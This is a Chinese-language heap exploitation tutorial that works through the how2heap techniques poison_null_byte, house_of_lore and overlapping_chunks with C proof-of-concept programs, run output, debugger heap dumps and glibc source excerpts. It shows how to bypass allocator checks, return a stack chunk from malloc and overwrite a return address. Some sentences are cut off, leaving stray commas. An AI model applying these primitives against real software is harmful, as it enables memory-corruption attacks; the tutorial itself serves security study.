2018-03-18 15:45:52 +07:00
# 3.3.7 Linux 堆利用(中)
2018-01-12 23:12:48 +07:00
- [how2heap ](#how2heap )
- [poison_null_byte ](#poison_null_byte )
- [house_of_lore ](#house_of_lore )
- [overlapping_chunks ](#overlapping_chunks )
- [overlapping_chunks_2 ](#overlapping_chunks_2 )
2018-03-18 15:45:52 +07:00
[下载文件 ](../src/Others/3.3.6_heap_exploit )
2018-01-12 23:12:48 +07:00
2018-01-14 21:33:28 +07:00
## how2heap
2018-01-12 23:12:48 +07:00
#### poison_null_byte
2018-01-13 22:52:15 +07:00
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
int main() {
uint8_t *a, *b, *c, *b1, *b2, *d;
a = (uint8_t*) malloc(0x10);
int real_a_size = malloc_usable_size(a);
fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n", a);
fprintf(stderr, "'real' size of 'a': %#x\n", real_a_size);
b = (uint8_t*) malloc(0x100);
c = (uint8_t*) malloc(0x80);
fprintf(stderr, "b: %p\n", b);
fprintf(stderr, "c: %p\n", c);
uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
*(size_t* )(b+0xf0) = 0x100;
fprintf(stderr, "b.size: %#lx ((0x100 + 0x10) | prev_in_use)\n\n", *b_size_ptr);
// deal with tcache
// int *k[10], i;
// for (i = 0; i < 7 ; i + + ) {
// k[i] = malloc(0x100);
// }
// for (i = 0; i < 7 ; i + + ) {
// free(k[i]);
// }
free(b);
uint64_t* c_prev_size_ptr = ((uint64_t*)c) - 2;
fprintf(stderr, "After free(b), c.prev_size: %#lx\n", *c_prev_size_ptr);
a[real_a_size] = 0; // < --- THIS IS THE " EXPLOITED BUG "
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);
fprintf(stderr, "Pass the check: chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n", *((size_t* )(b-0x8)), *(size_t* )(b-0x10 + *((size_t* )(b-0x8))));
b1 = malloc(0x80);
memset(b1, 'A', 0x80);
fprintf(stderr, "We malloc 'b1': %p\n", b1);
fprintf(stderr, "c.prev_size: %#lx\n", *c_prev_size_ptr);
fprintf(stderr, "fake c.prev_size: %#lx\n\n", *(((uint64_t* )c)-4));
b2 = malloc(0x40);
memset(b2, 'A', 0x40);
fprintf(stderr, "We malloc 'b2', our 'victim' chunk: %p\n", b2);
// deal with tcache
// for (i = 0; i < 7 ; i + + ) {
// k[i] = malloc(0x80);
// }
// for (i = 0; i < 7 ; i + + ) {
// free(k[i]);
// }
free(b1);
free(c);
fprintf(stderr, "Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
d = malloc(0x110);
fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2': %p\n\n", d);
fprintf(stderr, "b2 content:%s\n", b2);
memset(d, 'B', 0xb0);
fprintf(stderr, "New b2 content:%s\n", b2);
}
```
```
$ gcc -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xabb010
'real' size of 'a': 0x18
b: 0xabb030
c: 0xabb140
b.size: 0x111 ((0x100 + 0x10) | prev_in_use)
After free(b), c.prev_size: 0x110
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100
Pass the check: chunksize(P) == 0x100 == 0x100 == prev_size (next_chunk(P))
We malloc 'b1': 0xabb030
c.prev_size: 0x110
fake c.prev_size: 0x70
We malloc 'b2', our 'victim' chunk: 0xabb0c0
Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').
Finally, we allocate 'd', overlapping 'b2': 0xabb030
b2 content:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
New b2 content:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```
该技术适用的场景需要某个 malloc 的内存区域存在一个单字节溢出漏洞。
首先分配三个 chunk, , ,
首先是溢出,那么就需要知道一个堆块实际可用的内存大小(因为空间复用,可能会比分配时要大一点),用于获得该大小的函数 `malloc_usable_size` 如下:
```c
/*
------------------------- malloc_usable_size -------------------------
*/
static size_t
musable (void *mem)
{
mchunkptr p;
if (mem != 0)
{
p = mem2chunk (mem);
[...]
if (chunk_is_mmapped (p))
return chunksize (p) - 2 * SIZE_SZ;
else if (inuse (p))
return chunksize (p) - SIZE_SZ;
}
return 0;
}
```
```c
/* check for mmap()'ed chunk */
#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
/* extract p's inuse bit */
#define inuse(p) \
((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
/* Get size, ignoring use bits */
#define chunksize(p) ((p)->size & ~(SIZE_BITS))
```
所以 `real_a_size = chunksize(a) - 0x8 == 0x18` 。另外需要注意的是程序是通过 next chunk 的 `PREV_INUSE` 标志来判断某 chunk 是否被使用的。
为了在修改 chunk b 的 size 字段后,依然能通过 unlink 的检查,我们需要伪造一个 c.prev_size 字段,字段的大小是很好计算的,即 `0x100 == (0x111 & 0xff00)` ,正好是 NULL 字节溢出后的值。然后把 chunk b 释放掉, :
```
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 < -- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000111 < -- chunk b [ be freed ]
0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 < -- fd , bk pointer
0x603040: 0x0000000000000000 0x0000000000000000
0x603050: 0x0000000000000000 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000000000
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000
0x603090: 0x0000000000000000 0x0000000000000000
0x6030a0: 0x0000000000000000 0x0000000000000000
0x6030b0: 0x0000000000000000 0x0000000000000000
0x6030c0: 0x0000000000000000 0x0000000000000000
0x6030d0: 0x0000000000000000 0x0000000000000000
0x6030e0: 0x0000000000000000 0x0000000000000000
0x6030f0: 0x0000000000000000 0x0000000000000000
0x603100: 0x0000000000000000 0x0000000000000000
0x603110: 0x0000000000000000 0x0000000000000000
0x603120: 0x0000000000000100 0x0000000000000000 < -- fake c . prev_size
0x603130: 0x0000000000000110 0x0000000000000090 < -- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
→ Chunk(addr=0x603030, size=0x110, flags=PREV_INUSE)
```
最关键的一步,通过溢出漏洞覆写 chunk b 的数据:
```
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 < -- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000100 < -- chunk b [ be freed ]
0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 < -- fd , bk pointer
0x603040: 0x0000000000000000 0x0000000000000000
0x603050: 0x0000000000000000 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000000000
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000
0x603090: 0x0000000000000000 0x0000000000000000
0x6030a0: 0x0000000000000000 0x0000000000000000
0x6030b0: 0x0000000000000000 0x0000000000000000
0x6030c0: 0x0000000000000000 0x0000000000000000
0x6030d0: 0x0000000000000000 0x0000000000000000
0x6030e0: 0x0000000000000000 0x0000000000000000
0x6030f0: 0x0000000000000000 0x0000000000000000
0x603100: 0x0000000000000000 0x0000000000000000
0x603110: 0x0000000000000000 0x0000000000000000
0x603120: 0x0000000000000100 0x0000000000000000 < -- fake c . prev_size
0x603130: 0x0000000000000110 0x0000000000000090 < -- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
→ Chunk(addr=0x603030, size=0x100, flags=)
```
这时,根据我们上一篇文字中讲到的计算方法:
- `chunksize(P) == *((size_t*)(b-0x8)) & (~ 0x7) == 0x100`
- `prev_size (next_chunk(P)) == *(size_t*)(b-0x10 + 0x100) == 0x100`
可以成功绕过检查。另外 unsorted bin 中的 chunk 大小也变成了 0x100。
接下来随意分配两个 chunk,
```
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 < -- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000091 < -- chunk b1 < -- fake chunk b
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x4141414141414141 0x4141414141414141
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000051 < -- chunk b2 < -- ' victim ' chunk
0x6030c0: 0x4141414141414141 0x4141414141414141
0x6030d0: 0x4141414141414141 0x4141414141414141
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 < -- unsorted bin
0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 < -- fd , bk pointer
0x603120: 0x0000000000000020 0x0000000000000000 < -- fake c . prev_size
0x603130: 0x0000000000000110 0x0000000000000090 < -- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
```
这里有个很有趣的东西,分配堆块后,发生变化的是 fake c.prev\_size,
接下来是见证奇迹的时刻,我们知道,两个相邻的 small chunk 被释放后会被合并在一起。首先释放 chunk b1, , , ,
```
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 < -- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000020fe1 < -- top chunk
0x603030: 0x0000000000603100 0x00007ffff7dd1b78
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x4141414141414141 0x4141414141414141
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000090 0x0000000000000050 < -- chunk b2 < -- ' victim ' chunk
0x6030c0: 0x4141414141414141 0x4141414141414141
0x6030d0: 0x4141414141414141 0x4141414141414141
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 < -- unsorted bin
0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 < -- fd , bk pointer
0x603120: 0x0000000000000020 0x0000000000000000
0x603130: 0x0000000000000110 0x0000000000000090
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
```
chunk 合并的过程如下,首先该 chunk 与前一个 chunk 合并,然后检查下一个 chunk 是否为 top chunk, , :
```c
/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(av, p, bck, fwd);
}
if (nextchunk != av->top) {
/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
*/
[...]
}
/*
If the chunk borders the current high end of memory,
consolidate into top
*/
else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}
```
接下来,申请一块大空间,大到可以把 chunk b2 包含进来,这样 chunk b2 就完全被我们控制了。
```
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 < -- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000121 < -- chunk d
0x603030: 0x4242424242424242 0x4242424242424242
0x603040: 0x4242424242424242 0x4242424242424242
0x603050: 0x4242424242424242 0x4242424242424242
0x603060: 0x4242424242424242 0x4242424242424242
0x603070: 0x4242424242424242 0x4242424242424242
0x603080: 0x4242424242424242 0x4242424242424242
0x603090: 0x4242424242424242 0x4242424242424242
0x6030a0: 0x4242424242424242 0x4242424242424242
0x6030b0: 0x4242424242424242 0x4242424242424242 < -- chunk b2 < -- ' victim ' chunk
0x6030c0: 0x4242424242424242 0x4242424242424242
0x6030d0: 0x4242424242424242 0x4242424242424242
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 < -- small bins
0x603110: 0x00007ffff7dd1b88 0x00007ffff7dd1b88 < -- fd , bk pointer
0x603120: 0x0000000000000020 0x0000000000000000
0x603130: 0x0000000000000110 0x0000000000000090
0x603140: 0x0000000000000000 0x0000000000020ec1 < -- top chunk
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
```
还有个事情值得注意,在分配 chunk d 时,由于在 unsorted bin 中没有找到适合的 chunk,
最后,继续看 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,把两种大小的 tcache bin 都占满。
heap-buffer-overflow, , ,
```
$ gcc -fsanitize=address -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0x60200000eff0
'real' size of 'a': 0x10
b: 0x611000009f00
c: 0x60c00000bf80
=================================================================
==2369==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ef8 at pc 0x000000400be0 bp 0x7ffe7826e9a0 sp 0x7ffe7826e990
READ of size 8 at 0x611000009ef8 thread T0
#0 0x400bdf in main /home/firmy/how2heap/poison_null_byte.c:22
#1 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x400978 in _start (/home/firmy/how2heap/a.out+0x400978)
0x611000009ef8 is located 8 bytes to the left of 256-byte region [0x611000009f00,0x61100000a000)
allocated by thread T0 here:
#0 0x7f47d9425602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400af1 in main /home/firmy/how2heap/poison_null_byte.c:15
#2 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
```
2018-01-12 23:12:48 +07:00
#### house_of_lore
2018-01-14 21:33:28 +07:00
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
void jackpot(){ puts("Nice jump d00d"); exit(0); }
int main() {
intptr_t *victim = malloc(0x80);
memset(victim, 'A', 0x80);
void *p5 = malloc(0x10);
memset(p5, 'A', 0x10);
intptr_t *victim_chunk = victim - 2;
fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
intptr_t* stack_buffer_1[4] = {0};
intptr_t* stack_buffer_2[3] = {0};
stack_buffer_1[0] = 0;
stack_buffer_1[2] = victim_chunk;
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
free((void*)victim);
fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
void *p2 = malloc(0x100);
fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
victim[1] = (intptr_t)stack_buffer_1;
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
void *p3 = malloc(0x40);
char *p4 = malloc(0x80);
memset(p4, 'A', 0x10);
fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
intptr_t sc = (intptr_t)jackpot;
memcpy((p4+40), & sc, 8);
}
```
```
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x1b2e010
stack_buffer_1: 0x7ffe5c570350
stack_buffer_2: 0x7ffe5c570330
Freeing the victim chunk 0x1b2e010, it will be inserted in the unsorted bin
victim->fd: 0x7f239d4c9b78
victim->bk: 0x7f239d4c9b78
Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x1b2e0c0
The victim chunk 0x1b2e010 will be inserted in front of the SmallBin
victim->fd: 0x7f239d4c9bf8
victim->bk: 0x7f239d4c9bf8
Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffe5c570360
The fd pointer of stack_buffer_2 has changed: 0x7f239d4c9bf8
Nice jump d00d
```
在前面的技术中,我们已经知道怎样去伪造一个 fake chunk, ,
首先创建两个 chunk, , , , , , ; ,
```
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 < -- victim chunk
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000000 0x0000000000000021 < -- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000020f51 < -- top chunk
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx & stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 < -- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed < -- fd- > fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 < -- fake chunk 1
0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 < -- fd- > victim chunk, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
```
molloc 中对于 small bin 链表的检查是这样的:
```c
[...]
else
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
{
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;
[...]
```
接下来释放掉 victim chunk,
```
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 < -- victim chunk [ be freed ]
0x603010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 < -- fd , bk pointer
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000090 0x0000000000000020 < -- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000020f51 < -- top chunk
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603000, bk=0x603000
→ Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)
```
这时,申请一块大的 chunk, , :
```
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[8]: fw=0x603000, bk=0x603000
→ Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)
```
接下来是最关键的一步,假设存在一个漏洞,可以让我们修改 victim chunk 的 bk 指针。那么就修改 bk 让它指向我们在栈上布置的 fake small bin:
```
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 < -- victim chunk [ be freed ]
0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50 < -- bk- > fake chunk 1
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000090 0x0000000000000020 < -- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000111 < -- chunk p2
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx & stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 < -- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed < -- fd- > fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 < -- fake chunk 1
0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 < -- fd- > victim chunk, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
```
我们知道 small bins 是先进后出的,节点的增加发生在链表头部,而删除发生在尾部。这时整条链是这样的:
```
HEAD(undefined) < - > fake chunk 2 < - > fake chunk 1 < - > victim chunk < - > TAIL
fd: ->
bk: < -
```
fake chunk 2 的 bk 指向了一个未定义的地址,如果能通过内存泄露等手段,拿到 HEAD 的地址并填进去,整条链就闭合了。当然这里完全没有必要这么做。
接下来的第一个 malloc, , , , , , ,
```
HEAD(undefined) < - > fake chunk 2 < - > fake chunk 1 < - > TAIL
```
```
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000051 < -- chunk p3
0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x0000000000000041 < -- unsorted bin
0x603060: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 < -- fd , bk pointer
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000040 0x0000000000000020 < -- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000111 < -- chunk p2
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx & stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 < -- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed < -- fd- > fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 < -- fake chunk 1
0x7fffffffdc60: 0x00007ffff7dd1bf8 0x00007fffffffdc30 < -- fd- > TAIL, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603050, bk=0x603050
→ Chunk(addr=0x603060, size=0x40, flags=PREV_INUSE)
```
最后,再次 malloc 将返回 fake chunk 1 的地址,地址在栈上且我们能够控制。同时 small bin 变成这样:
```
HEAD(undefined) < - > fake chunk 2 < - > TAIL
```
```
gef➤ x/10gx & stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 < -- fake chunk 2
0x7fffffffdc40: 0x00007ffff7dd1bf8 0x0000000000400aed < -- fd- > TAIL
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 < -- chunk 4
0x7fffffffdc60: 0x4141414141414141 0x4141414141414141
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
```
于是我们就成功地骗过了 malloc 在栈上分配了一个 chunk。
最后再想一下,其实最初的 victim chunk 使用 fast chunk 也是可以的,其释放后虽然是被加入到 fast bins 中,而不是 unsorted bin,
heap-use-after-free,
```
$ gcc -fsanitize=address -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x60c00000bf80
stack_buffer_1: 0x7ffd1fbc5cd0
stack_buffer_2: 0x7ffd1fbc5c90
Freeing the victim chunk 0x60c00000bf80, it will be inserted in the unsorted bin
=================================================================
==6034==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00000bf80 at pc 0x000000400eec bp 0x7ffd1fbc5bf0 sp 0x7ffd1fbc5be0
READ of size 8 at 0x60c00000bf80 thread T0
#0 0x400eeb in main /home/firmy/how2heap/house_of_lore.c:27
#1 0x7febee33c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38)
```
2018-01-12 23:12:48 +07:00
#### overlapping_chunks
2018-01-14 21:33:28 +07:00
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
int main() {
intptr_t *p1,*p2,*p3,*p4;
p1 = malloc(0x90 - 8);
p2 = malloc(0x90 - 8);
p3 = malloc(0x80 - 8);
memset(p1, 'A', 0x90 - 8);
memset(p2, 'A', 0x90 - 8);
memset(p3, 'A', 0x80 - 8);
fprintf(stderr, "Now we allocate 3 chunks on the heap\n");
fprintf(stderr, "p1=%p\np2=%p\np3=%p\n\n", p1, p2, p3);
free(p2);
fprintf(stderr, "Freeing the chunk p2\n");
int evil_chunk_size = 0x111;
int evil_region_size = 0x110 - 8;
*(p2-1) = evil_chunk_size; // Overwriting the "size" field of chunk p2
fprintf(stderr, "Emulating an overflow that can overwrite the size of the chunk p2.\n\n");
p4 = malloc(evil_region_size);
fprintf(stderr, "p4: %p ~ %p\n", p4, p4+evil_region_size);
fprintf(stderr, "p3: %p ~ %p\n", p3, p3+0x80);
fprintf(stderr, "\nIf we memset(p4, 'B', 0xd0), we have:\n");
memset(p4, 'B', 0xd0);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);
fprintf(stderr, "\nIf we memset(p3, 'C', 0x50), we have:\n");
memset(p3, 'C', 0x50);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);
}
```
```
$ gcc -g overlapping_chunks.c
$ ./a.out
Now we allocate 3 chunks on the heap
p1=0x1e2b010
p2=0x1e2b0a0
p3=0x1e2b130
Freeing the chunk p2
Emulating an overflow that can overwrite the size of the chunk p2.
p4: 0x1e2b0a0 ~ 0x1e2b8e0
p3: 0x1e2b130 ~ 0x1e2b530
If we memset(p4, 'B', 0xd0), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa�
p3 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa�
If we memset(p3, 'C', 0x50), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa�
p3 = CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa�
```
这个比较简单,就是堆块重叠的问题。通过一个溢出漏洞,改写 unsorted bin 中空闲堆块的 size,
首先分配三个堆块,然后释放掉中间的一个:
```
gef➤ x/60gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 < -- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x4141414141414141
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x0000000000000091 < -- chunk 2 [ be freed ]
0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
